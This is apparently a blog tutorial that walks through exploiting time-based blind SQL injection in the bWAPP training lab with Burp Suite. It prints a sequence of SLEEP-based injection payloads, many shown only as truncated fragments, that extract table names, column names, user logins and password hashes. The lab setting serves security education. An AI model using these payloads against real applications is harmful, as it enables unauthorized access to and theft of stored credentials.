Exploiting Time-based blind SQLi

4 min readDec 19, 2022


In this post we will try to exploit the Time-based blind SQLi. I will only give the final query and final output from the query it is same as that of boolean-based blind SQLi ony difference if condition is true we will ask database(application) to sleep/delay for mentioned time.

Open the bwapp 2.2 and visit the page “SQL Injection — Blind — Time-Based” as shown below. The functionality is same which search if movie present in database or not.

bWAPP 2.2

Now lets start the burp suite proxy and use the embedded browser. I forward the normal request to the repeater.

Request & Response in the repeater

Now let’s check if this is vulnerable to time based SQLi. I used the payload “IRON MAN’ AND SLEEP(10) — “, If the movie is present then the response will take 10 seconds to come back.

The movie is present and time delay is almost 10 ms.

Let’s try what if movie is not in the database and we ask the database to sleep for 10 seconds.

The movie is not in database and hence there is no time delay.

The above steps proved that the application is vulnerable to time based SQLI.

Now lets first try to find the name of current database, for this I will use burp’s intruder functionality. Hope you know the steps to use it.

From intruder’s result we I can say that the length of the name of database is 5. The query in the repeater looks like below.,SLEEP(10),NULL)+--+&action=search

Repeater showing length of name of database with time delay close to 10 seconds

Now we know the length of the name of the database, let’s try to find the name of the database."bwapp%",SLEEP(10),NULL)+--+&action=search

name of the database is bwapp

Now let’s find out the number of tables in the database.*)FROM+information_schema.tables+WHERE+table_schema=database())=5,SLEEP(10),NULL)+--+&action=search

Number of tables in database 5

After this we must know the name of tables in the database. For that I will use LIMIT clause did before.

Length of name of first table is 4:,1)=4,SLEEP(10),NULL)+--+&action=search

Length of name of second table is 6:,1)=6,SLEEP(10),NULL)+--+&action=search

Length of name of third table is 6:,1)=6,SLEEP(10),NULL)+--+&action=search

Length of name of fourth table is 5:,1)=5,SLEEP(10),NULL)+--+&action=search

Length of name of fifth table is 8:,1)=8,SLEEP(10),NULL)+--+&action=search

After this, we need to find the name of each table.

First table is: blogs,1)+LIKE+"blog%",SLEEP(10),NULL)+--+&action=search

Second table is: heroes,1)+LIKE+"heroe%",SLEEP(10),NULL)+--+&action=search

Third table is: movies,1)+LIKE+"movies%",SLEEP(10),NULL)+--+&action=search

Fourth table is: users,1)+LIKE+"users%",SLEEP(10),NULL)+--+&action=search

Fifth table is: visitors,1)+LIKE+"visitors%",SLEEP(10),NULL)+--+&action=search

We have name of all five tables, we are interested in “users” table. For extracting data, we should know the number of columns in users.*)+FROM+information_schema.columns+WHERE+table_schema=database()+AND+table_name='users')=9,SLEEP(10),NULL)+--+&action=search

There are 9 columns in users table. Now we need to find the length of name of each column. We will do that with limit clause again.

Length of first column name'users'+LIMIT+0,1)=2,SLEEP(10),NULL)+--+&action=search

Similarly by changing LIMIT clause, we are able to extract the length of each column name in users table.

After that, we need to find the name of columns.I am able to find the column names as below.

Column names

Now we know the column names, we are interested in login and password. The length of login for first user can be find with:,1)=6,SLEEP(10),NULL)+--+&action=search

The length of login for second user can be find with:,1)=3,SLEEP(10),NULL)+--+&action=search

Now lets find the login name. The final queries for first and second users are:,1)+LIKE+"a.i.m.%",SLEEP(10),NULL)+--+&action=search,1)+LIKE+"bee%",SLEEP(10),NULL)+--+&action=search

So we have user names, now we need to find the password for these users. Using below query we can able to find the hash of the password.,1)+LIKE+"68%",SLEEP(10),NULL)+--+&action=search

We need to change the characters in LIKE clause using intruder and find the whole hash for user one. For another user, update 0 in LIMIT clause with 1 and do the same procedure.

This way we are able to exploit the Time-based blind sql injection.

Hope you like the whole series.